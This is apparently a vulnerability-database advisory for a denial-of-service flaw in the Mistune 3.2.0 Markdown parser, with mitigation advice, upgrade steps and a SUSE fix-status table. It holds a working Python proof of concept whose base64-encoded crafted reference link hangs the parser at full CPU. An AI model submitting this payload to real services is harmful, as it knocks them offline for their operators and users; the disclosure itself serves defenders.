Mistune CVE-2026-33441
HIGHSeverity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Primary rating from SUSE · only source for this CVE.
Lifecycle Timeline
2DescriptionCVE.org
Summary
Denial-of-Service (DoS) vulnerability in the Mistune Markdown parser. The issue occurs when processing specially crafted reference links, which can cause excessive parsing and CPU consumption, leading to application hangs.
Function affected: parse_link_title() in helpers.py Issue: Malformed reference links cause excessive backtracking and parsing loops. Impact: Remote attackers can submit malicious Markdown to hang processes, causing service unavailability.
Details
Name: mistune
Version: 3.2.0
Python version: Python 3.13.9
PIP version: pip 25.2
OS: Kali-linux-VERSION="2025.4"PoC
import mistune
import base64
print("Exploit started....!")
data = base64.b64decode(
"WX5Efn5+RH5+fkRbIVt6XQoKW3q7XTpdOgoifn5+RFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcflt+RFshW3pdCgpbeg=="
)
mistune.html(data.decode("utf-8", errors="ignore"))Reproduce steps:
Simply execute above python script it will hang & increase cpu utilization to 100%
Fuzzer Output (libFuzzer):
ERROR: libFuzzer: timeout after 3 seconds
SUMMARY: libFuzzer: timeoutStack Trace (Excerpt):
mistune/helpers.py:170 in parse_link_title
mistune/block_parser.py:259 in parse_ref_link
mistune/core.py:216 in parse_method
mistune/block_parser.py:458 in parse
mistune/markdown.py:93 in parse
mistune/markdown.py:120 in __call__IMAGE POC:
<img width="1194" height="728" alt="POC" src="https://github.com/user-attachments/assets/009e836f-fff7-439e-b0be-6e889bed0077" />
Impact:
Denial-of-Service (DoS) High CPU usage and application hang Potential for service unavailability in web apps or APIs processing untrusted Markdown
Suggested Mitigations:
Implement parsing depth and iteration limits. Limit reference-link title length. Detects excessive escape character sequences. Add defensive checks in parse_link_title. Add fuzz regression tests using the provided PoC.
This vulnerability was discovered using coverage-guided fuzzing and is reproducible consistently.
AnalysisAI
Malformed reference links in Mistune 3.2.0 trigger algorithmic complexity attacks in the parse_link_title() function, causing 100% CPU consumption and permanent process hangs. The vulnerability affects Python applications processing untrusted Markdown content, enabling remote denial-of-service through minimal-size payloads (the provided POC is under 200 bytes). A publicly available proof-of-concept demonstrates consistent exploitation discovered via coverage-guided fuzzing. Vendor patch 3.2.1 addresses the issue by implementing parsing limits and defensive checks.
Technical ContextAI
Mistune is a widely-used fast Markdown parser written in pure Python, commonly deployed in web applications, static site generators, documentation systems, and content management platforms. The vulnerability resides in the parse_link_title() function within helpers.py, which handles Markdown reference-style link syntax parsing. CWE-400 (Uncontrolled Resource Consumption) manifests when the parser encounters specially crafted input containing nested reference links with excessive escape character sequences. The malformed syntax triggers catastrophic backtracking in the parsing loop, where each iteration attempts to resolve deeply nested reference structures without depth or iteration limits. The stack trace confirms the attack path flows through parse_ref_link in the block parser, leading to unbounded recursion. The vulnerable package identifier is pkg:pip/mistune version 3.2.0, affecting Python environments running this specific release.
RemediationAI
Upgrade to Mistune version 3.2.1 immediately, which implements parsing depth limits, reference-link title length restrictions, and defensive validation in parse_link_title() per vendor advisory at https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c. Execute upgrade via pip: 'pip install --upgrade mistune==3.2.1' and verify installation with 'pip show mistune'. For environments unable to patch immediately, implement application-layer mitigations: configure process timeout limits (5-10 seconds maximum for Markdown parsing operations) to prevent indefinite hangs, deploy resource controls using cgroups or containerization to cap CPU allocation per parsing request, implement input validation rejecting Markdown documents exceeding reasonable size thresholds (suggested 100KB maximum), and sanitize or strip reference-style link syntax before passing to Mistune. Trade-off: timeout mechanisms will terminate legitimate parsing of very large documents; input filtering may break valid Markdown features. These compensating controls provide partial protection but do not address the root cause and may impact legitimate use cases. Add the provided POC to regression test suites to validate remediation effectiveness.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-400 – Uncontrolled Resource Consumption
View allSame technique Denial Of Service
View allVendor StatusVendor
SUSE
Severity: High| Product | Status |
|---|---|
| SUSE Linux Enterprise Desktop 15 SP7 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP7 | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP7 | Fixed |
| SUSE Linux Enterprise Server 15 SP7 | Fixed |
| SUSE Linux Enterprise Server 16.0 | Fixed |
| SUSE Linux Enterprise Server 16.1 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.0 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.1 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP4 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP5 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP4 | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP5 | Fixed |
| SUSE Linux Enterprise Module for Python 3 15 SP6 | Fixed |
| SUSE Linux Enterprise Server 15 SP4 | Fixed |
| SUSE Linux Enterprise Server 15 SP4-LTSS | Fixed |
| SUSE Linux Enterprise Server 15 SP5 | Fixed |
| SUSE Linux Enterprise Server 15 SP5-LTSS | Fixed |
| SUSE Linux Enterprise Server 15 SP6 | Fixed |
| SUSE Linux Enterprise Server 15 SP6-LTSS | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP6 | Fixed |
| SUSE Manager Proxy 4.3 | Fixed |
| SUSE Manager Retail Branch Server 4.3 | Fixed |
| SUSE Manager Server 4.3 | Fixed |
| SUSE Linux Enterprise Desktop 15 SP4 | Fixed |
| SUSE Linux Enterprise Desktop 15 SP5 | Fixed |
| SUSE Linux Enterprise Desktop 15 SP6 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP6 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP4 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP5 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP6 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP4 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP5 | Fixed |
| openSUSE Leap 15.3 | Fixed |
| openSUSE Leap 15.4 | Fixed |
| openSUSE Leap 15.5 | Fixed |
| openSUSE Leap 15.6 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today